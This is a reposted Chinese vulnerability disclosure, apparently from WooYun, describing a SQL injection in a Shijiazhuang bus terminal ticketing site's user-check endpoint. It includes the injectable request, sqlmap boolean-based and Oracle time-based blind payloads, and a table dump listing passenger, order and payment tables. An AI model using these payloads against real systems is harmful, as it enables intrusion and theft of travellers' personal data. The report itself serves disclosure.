神刀安全网

漏洞標題: 石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

漏洞詳情

披露狀態:

2016-04-27: 細節已通知廠商並且等待廠商處理中
2016-04-29: 廠商已經確認,細節僅向廠商公開
2016-05-09: 細節向核心白帽子及相關領域專家公開
2016-05-19: 細節向普通白帽子公開
2016-05-29: 細節向實習白帽子公開
2016-06-13: 細節向公眾公開

簡要描述:

石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)

詳細說明:

code 区域
**.**.**.**/Register.jsp

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

检查用户是否存在

code 区域
GET **.**.**.**/CheckUserValue?userValue=test HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**/Register.jsp
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)
Host: **.**.**.**
Connection: Keep-Alive
Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3

userValue参数存在注入

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

盲注,直接上SQLMAP

漏洞證明:

code 区域
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 9336=9336 AND 'CUrZ'='CUrZ

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(85)||CHR(99),5) AND 'NaxB'='NaxB
---
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'SJZWEB'

code 区域
Database: SJZWEB
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| TB_WEB_ERROR | 2980653 |
| TB_WEB_USER_LOG | 610631 |
| TB_WEB_LOG | 422999 |
| TB_IMAGE_VALID | 72548 |
| TB_WEB_ALIPAY | 69898 |
| TB_WEB_SEAT_LOCK | 33135 |
| TB_WEB_ORDER | 26011 |
| TB_WEB_USER | 16203 |
| TB_WEB_USER_ONLINE | 13147 |
| TB_WEB_MSG_SEND | 2033 |
| TB_WEB_ORDER_BUILD | 1191 |
| TB_CITY | 363 |
| TB_NEW_SCHEDULE | 172 |
| TB_WEB_TICKETSALE_UPD | 125 |
| TB_WEB_ALL_ROUTE | 101 |
| TB_PROVINCE | 34 |
| TB_WEB_PARAMETER | 13 |
| TB_WEB_AD | 8 |
| TB_WEB_NEW_SCHEDULE | 8 |
| TB_ANSWER_QUESTION | 6 |
| TB_GATEWAY | 1 |
| TB_WEB_DISCOUNT | 1 |
| TB_WEB_SALE_SCHEDULE | 1 |
| TB_WEB_SEATPASSWORD | 1 |
+-----------------------+---------+

用户登陆日志包含用户ip,session

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

用户订单界面,涵盖用户的支付宝订单号,出发地,登陆ip,付款金额,目的地站点名称等详细信息

漏洞標題:  石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

修復方案:

过滤敏感字符

版權聲明:轉載請註明來源 路人甲@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: 石家庄客运总站某站点SQL注入(含旅客身份证号/手机号/住址/订单时间去向)(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址